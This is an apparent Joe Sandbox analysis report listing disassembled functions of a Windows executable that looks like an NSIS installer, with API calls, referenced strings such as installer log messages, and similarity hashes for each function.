Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: Global$AllocFileFree$CloseDeleteHandleWrite
String ID: created uninstaller: %d, "%s"
API String ID: 3294113728-3145124454
Opcode ID: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
Instruction ID: 876417c632a2c352b67fb01c84f3ccb8dada3a759dccfb7ac575e016526b3130
Opcode Fuzzy Hash: c666975226392a23a96cc8c7abb3eb5c8f7508c76e04a15e1ccd320165ca38cb
Instruction Fuzzy Hash: E231B272800115BBCB11AFA4CE45DAF7FB9EF08364F10023AF555B61E1CB794E419B98

Function 004060E7 Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 72filestringCOMMON

Download Yara Rule

APIs

CloseHandle.KERNEL32(FFFFFFFF,00000000,?,?,004062D4,00000000), ref: 004060FE
GetFileAttributesW.KERNEL32(0046A560,?,00000000,00000000,?,?,004062D4,00000000), ref: 0040613C
WriteFile.KERNEL32(00000000,000000FF,00000002,00000000,00000000,0046A560,40000000,00000004), ref: 00406175
SetFilePointer.KERNEL32(00000000,00000000,00000000,00000002,0046A560,40000000,00000004), ref: 00406181
lstrcatW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00409678), ref: 0040619B
lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),?,?,004062D4,00000000), ref: 004061A2
WriteFile.KERNEL32(RMDir: RemoveDirectory invalid input(""),00000000,004062D4,00000000,?,?,004062D4,00000000), ref: 004061B7

Strings

RMDir: RemoveDirectory invalid input(""), xrefs: 00406195, 0040619A, 004061A1, 004061B0

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: File$Write$AttributesCloseHandlePointerlstrcatlstrlen
String ID: RMDir: RemoveDirectory invalid input("")
API String ID: 3734993849-2769509956
Opcode ID: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction ID: 719ae6cd10854ac59b0cdc08190af65770ef99398ad526dd54b0ef62760a23c4
Opcode Fuzzy Hash: db2296b131d449b30ff8990abd275774a0521ce3dbf342b3e8cfb01d18cadc82
Instruction Fuzzy Hash: 4621F271400200BBD710AB64DD88D9B376CEB02370B25C73AF626BA1E1E77449868BAD

Function 00403DCA Relevance: 12.1, APIs: 8, Instructions: 60COMMON

Download Yara Rule

APIs

GetWindowLongW.USER32(?,000000EB), ref: 00403DE4
GetSysColor.USER32(00000000), ref: 00403E00
SetTextColor.GDI32(?,00000000), ref: 00403E0C
SetBkMode.GDI32(?,?), ref: 00403E18
GetSysColor.USER32(?), ref: 00403E2B
SetBkColor.GDI32(?,?), ref: 00403E3B
DeleteObject.GDI32(?), ref: 00403E55
CreateBrushIndirect.GDI32(?), ref: 00403E5F

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: Color$BrushCreateDeleteIndirectLongModeObjectTextWindow
String ID:
API String ID: 2320649405-0
Opcode ID: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction ID: efe235911933e34786796033030fc6f48e67331b78f43f6f4bde0ddab4ebbdd0
Opcode Fuzzy Hash: ac93da855729cb6ae330e7292f06b4dcfb528e6a29ab184958864ff4432b54b5
Instruction Fuzzy Hash: 7D1166715007046BCB219F78DE08B5BBFF8AF01755F048A2DE886F22A0D774DA48CB94

Function 004023F0 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 83libraryCOMMON

Download Yara Rule

APIs

GetModuleHandleW.KERNEL32(00000000,00000001,000000F0), ref: 0040241C

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

LoadLibraryExW.KERNEL32(00000000,?,00000008,00000001,000000F0), ref: 0040242D
FreeLibrary.KERNEL32(?,?), ref: 004024C3

Strings

Error registering DLL: Could not load %s, xrefs: 004024DB
Error registering DLL: %s not found in %s, xrefs: 0040249A
Error registering DLL: Could not initialize OLE, xrefs: 004024F1

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: MessageSendlstrlen$Library$FreeHandleLoadModuleTextWindowlstrcatwvsprintf
String ID: Error registering DLL: %s not found in %s$Error registering DLL: Could not initialize OLE$Error registering DLL: Could not load %s
API String ID: 1033533793-945480824
Opcode ID: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
Instruction ID: e967fad4df15afb35ea17a6f8951328f27fda4bee3b51f855042d01f5ead75df
Opcode Fuzzy Hash: aebbfb54fe117075fb91935afd2b3d42be9cb3525beaf419298f1839c78bdf39
Instruction Fuzzy Hash: 34219131904208BBCF206FA1CE45E9E7A74AF40314F30817FF511B61E1D7BD4A819A5D

Function 00404F72 Relevance: 10.6, APIs: 7, Instructions: 73stringwindowCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00406805: GetVersion.KERNEL32(0043B228,?,00000000,00404FA9,0043B228,00000000,?,00000000,00000000), ref: 004068D6

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: MessageSend$lstrlen$TextVersionWindowlstrcat
String ID:
API String ID: 2740478559-0
Opcode ID: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
Instruction ID: 1d640e6b4f0869ec625b39ce8112f9bd6789598538fb42bade37fe3884716a8e
Opcode Fuzzy Hash: 7bcaf298b14bfcb271399e4538be81cf37b8538d1c197863d88476df1de4366a
Instruction Fuzzy Hash: 3C21B0B1900518BACF119FA5DD84E9EBFB5EF84310F10813AFA04BA291D7798E509F98

Function 00402238 Relevance: 10.6, APIs: 3, Strings: 3, Instructions: 59synchronizationCOMMON

Download Yara Rule

APIs

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Part of subcall function 00404F72: lstrlenW.KERNEL32(0043B228,?,00000000,00000000), ref: 00404FAA
Part of subcall function 00404F72: lstrlenW.KERNEL32(004034BB,0043B228,?,00000000,00000000), ref: 00404FBA
Part of subcall function 00404F72: lstrcatW.KERNEL32(0043B228,004034BB), ref: 00404FCD
Part of subcall function 00404F72: SetWindowTextW.USER32(0043B228,0043B228), ref: 00404FDF
Part of subcall function 00404F72: SendMessageW.USER32(?,00001004,00000000,00000000), ref: 00405005
Part of subcall function 00404F72: SendMessageW.USER32(?,0000104D,00000000,00000001), ref: 0040501F
Part of subcall function 00404F72: SendMessageW.USER32(?,00001013,?,00000000), ref: 0040502D

Part of subcall function 00405C3F: CreateProcessW.KERNEL32(00000000,?,00000000,00000000,00000000,00000000,00000000,00000000,00457278,Error launching installer), ref: 00405C64
Part of subcall function 00405C3F: CloseHandle.KERNEL32(?), ref: 00405C71

WaitForSingleObject.KERNEL32(?,00000064,00000000,000000EB,00000000), ref: 00402288
GetExitCodeProcess.KERNEL32(?,?), ref: 00402298
CloseHandle.KERNEL32(?,00000000,000000EB,00000000), ref: 00402AF2

Strings

Exec: success ("%s"), xrefs: 00402263
Exec: command="%s", xrefs: 00402241
Exec: failed createprocess ("%s"), xrefs: 004022C2

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: MessageSendlstrlen$CloseHandleProcess$CodeCreateExitObjectSingleTextWaitWindowlstrcatwvsprintf
String ID: Exec: command="%s"$Exec: failed createprocess ("%s")$Exec: success ("%s")
API String ID: 2014279497-3433828417
Opcode ID: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
Instruction ID: 1f9fd54ce4b92d80b15c686f19ace2d36b15c716f321f29b17dee5dd027f7fd2
Opcode Fuzzy Hash: 04fd410bbb31de0d7d21d8cf733f8caec58fdd5b228a354368cf1c704b35d166
Instruction Fuzzy Hash: 3E11C632904115EBDB11BBE0DE46AAE3A61EF00314B24807FF501B50D1CBBC4D41D79D

Function 0040484E Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 48windowCOMMON

Download Yara Rule

APIs

SendMessageW.USER32(?,0000110A,00000009,00000000), ref: 00404869
GetMessagePos.USER32 ref: 00404871
ScreenToClient.USER32(?,?), ref: 00404889
SendMessageW.USER32(?,00001111,00000000,?), ref: 0040489B
SendMessageW.USER32(?,0000113E,00000000,?), ref: 004048C1

Strings

f, xrefs: 0040489D

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: Message$Send$ClientScreen
String ID: f
API String ID: 41195575-1993550816
Opcode ID: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction ID: 7db1728360bf3821ce9645a1193633f180912fe022e8629b13ab7a69f18166cd
Opcode Fuzzy Hash: e83bf87fd3d3de8100a00259917b631f02ad10d2ae0db71d55c08ccb040208c3
Instruction Fuzzy Hash: C5015E7290021CBAEB00DBA4DD85BEEBBB8AF54710F10452ABB50B61D0D7B85A058BA5

Function 0040324C Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40timeCOMMON

Download Yara Rule

APIs

SetTimer.USER32(?,00000001,000000FA,00000000), ref: 0040326A
MulDiv.KERNEL32(00011400,00000064,?), ref: 00403295
wsprintfW.USER32 ref: 004032A5
SetWindowTextW.USER32(?,?), ref: 004032B5
SetDlgItemTextW.USER32(?,00000406,?), ref: 004032C7

Strings

verifying installer: %d%%, xrefs: 0040329F

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: Text$ItemTimerWindowwsprintf
String ID: verifying installer: %d%%
API String ID: 1451636040-82062127
Opcode ID: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction ID: 2210906da4c477318a924a5c8cf459ae641b3a2c10b729e3aa38b42dd2c8d99c
Opcode Fuzzy Hash: 2242266ec469d88fb33e3e049bed9c2e1137abfcadbc35e47a6ba444652a7516
Instruction Fuzzy Hash: 98014470610109ABEF109F60DD49FAA3B69FB00349F00803DFA46B51E0DB7996558B58

Function 004043AD Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 73stringCOMMON

Download Yara Rule

APIs

lstrlenW.KERNEL32(00447240,%u.%u%s%s,?,00000000,00000000,?,FFFFFFDC,00000000,?,000000DF,00447240,?), ref: 0040444A
wsprintfW.USER32 ref: 00404457
SetDlgItemTextW.USER32(?,00447240,000000DF), ref: 0040446A

Strings

@rD, xrefs: 00404402
%u.%u%s%s, xrefs: 00404444

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: ItemTextlstrlenwsprintf
String ID: %u.%u%s%s$@rD
API String ID: 3540041739-1813061909
Opcode ID: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
Instruction ID: f1896056faf18a44ee7e341cc3389f256aee6b01e91544d35c55ed1e8b934206
Opcode Fuzzy Hash: 49e77ae85f825c85ec9bd325533554715bd64ccbe848738256e3a305efe714d4
Instruction Fuzzy Hash: EF11BD327002087BDB10AA6A9D45E9E765EEBC5334F10423BFA15F30E1F6788A218679

Function 00406038 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 71COMMON

Download Yara Rule

APIs

CharNextW.USER32(?,*?|<>/":,00000000,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 0040609B
CharNextW.USER32(?,?,?,00000000), ref: 004060AA
CharNextW.USER32(?,004D70C8,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060AF
CharPrevW.USER32(?,?,004C30A0,004D70C8,00000000,004037D8,004D70C8,-00000002,00403A0B), ref: 004060C3

Strings

*?|<>/":, xrefs: 0040608A

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: Char$Next$Prev
String ID: *?|<>/":
API String ID: 589700163-165019052
Opcode ID: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction ID: 6b5d27536512bbf775d32d1a11483b1b035cd55ac1fbc93341df7bc26af2800c
Opcode Fuzzy Hash: a05e433a329b084189efa29dbf9bba5ae0ab8f0c6b5464517f8198c591f21e0d
Instruction Fuzzy Hash: C611EB2184061559CB30FB659C4097BA6F9AE56750712843FE886F32C1FB7CCCE192BD

Function 0040149D Relevance: 7.6, APIs: 5, Instructions: 67registryCOMMON

Download Yara Rule

APIs

RegOpenKeyExW.ADVAPI32(?,?,00000000,?,?), ref: 004014BF
RegEnumKeyW.ADVAPI32(?,00000000,?,00000105), ref: 004014FB
RegCloseKey.ADVAPI32(?), ref: 00401504
RegCloseKey.ADVAPI32(?), ref: 00401529
RegDeleteKeyW.ADVAPI32(?,?), ref: 00401547

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: Close$DeleteEnumOpen
String ID:
API String ID: 1912718029-0
Opcode ID: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction ID: 29266b44d1cae769f6d8fca298176d7cc4518162af5fbc8546bcefd12e7d5eb7
Opcode Fuzzy Hash: 2b80b69c85b54ac5f33439f299733a34c1a7b021a45597119d957f721ab6f898
Instruction Fuzzy Hash: EF114972500008FFDF119F90EE85DAA3B7AFB54348F00407AFA06F6170D7759E54AA29

Function 0040209F Relevance: 7.5, APIs: 5, Instructions: 39windowCOMMON

Download Yara Rule

APIs

GetDlgItem.USER32(?), ref: 004020A3
GetClientRect.USER32(00000000,?), ref: 004020B0
LoadImageW.USER32(?,00000000,?,?,?,?), ref: 004020D1
SendMessageW.USER32(00000000,00000172,?,00000000), ref: 004020DF
DeleteObject.GDI32(00000000), ref: 004020EE

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: ClientDeleteImageItemLoadMessageObjectRectSend
String ID:
API String ID: 1849352358-0
Opcode ID: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
Instruction ID: a6d8e4af78efbdafb2d3f18e6b80530ac635d705efb76da9f8ac6e555915fa7b
Opcode Fuzzy Hash: 3f37f65ad39e50193b5eb5465f4a6a1b76990ca473236759665c0c01a91169be
Instruction Fuzzy Hash: 95F012B2600508AFDB00EBA4EF89DAF7BBCEB04305B104579F642F6161C6759E418B28

Function 00401F80 Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 84windowtimeCOMMON

Download Yara Rule

APIs

SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401FE6
SendMessageW.USER32(00000000,00000000,?,?), ref: 00401FFE

Strings

!, xrefs: 00401FB6

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: MessageSend$Timeout
String ID: !
API String ID: 1777923405-2657877971
Opcode ID: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction ID: e43e738488dd09895ebc4b193b1bc1394e214230f2e5861cb954e074e697f1bf
Opcode Fuzzy Hash: 268bfc816d722a3cdb4a25197971aab361e313674f42ba9e2dfc46ce407b5277
Instruction Fuzzy Hash: 93217171900209ABDF15AFB4D986ABE7BB9EF04349F14413EF602F60E2D6798A40D758

Function 004027E3 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 60registryCOMMON

Download Yara Rule

APIs

Part of subcall function 00401553: RegOpenKeyExW.ADVAPI32(?,00000000,00000022,00000000,?,?), ref: 0040158B

RegCloseKey.ADVAPI32(00000000), ref: 0040282E
RegDeleteValueW.ADVAPI32(00000000,00000000,00000033), ref: 0040280E

Part of subcall function 004062A3: lstrlenW.KERNEL32(RMDir: RemoveDirectory invalid input(""),00406E79,RMDir: RemoveDirectory("%s"),?,?,?), ref: 004062B0
Part of subcall function 004062A3: wvsprintfW.USER32(00000000,?,?), ref: 004062C7

Strings

DeleteRegValue: "%s\%s" "%s", xrefs: 00402820
DeleteRegKey: "%s\%s", xrefs: 00402843

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: CloseDeleteOpenValuelstrlenwvsprintf
String ID: DeleteRegKey: "%s\%s"$DeleteRegValue: "%s\%s" "%s"
API String ID: 1697273262-1764544995
Opcode ID: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
Instruction ID: a9eecf508c221bc7802a822649300ece756bcc80235207ffe39efc99e8d71eac
Opcode Fuzzy Hash: 48bae300e43d63654b7fe916574e47b7d5bb67918eda10473d167f607cc9ee43
Instruction Fuzzy Hash: FA11A772E00101ABDB10FFA5DD4AABE7AA4EF40354F14443FF50AB61D2D6BD8A50879D

Function 004048CC Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 58windowCOMMON

Download Yara Rule

APIs

IsWindowVisible.USER32(?), ref: 00404902
CallWindowProcW.USER32(?,00000200,?,?), ref: 00404970

Part of subcall function 00403DAF: SendMessageW.USER32(?,?,00000000,00000000), ref: 00403DC1

Strings

, xrefs: 004048DA
@rD, xrefs: 00404934

Memory Dump Source

Source File: 00000007.00000002.2860414503.0000000000401000.00000020.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Associated: 00000007.00000002.2860385341.0000000000400000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861378326.0000000000408000.00000002.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000040B000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.000000000041F000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861436785.0000000000461000.00000004.00000001.01000000.00000006.sdmpDownload File
Associated: 00000007.00000002.2861713654.00000000004F4000.00000002.00000001.01000000.00000006.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_7_2_400000_9CFE.jbxd

Similarity

API ID: Window$CallMessageProcSendVisible
String ID: $@rD
API String ID: 3748168415-881980237
Opcode ID: dbb9f75acddd66739c757162f424edfdbc4896bcfe3732b5d05f7797001715e0
Instruction ID: bed307b1c5f775dd60c200178c13c7fdb07d6bd57f5d25ab133f42f3a31df96a
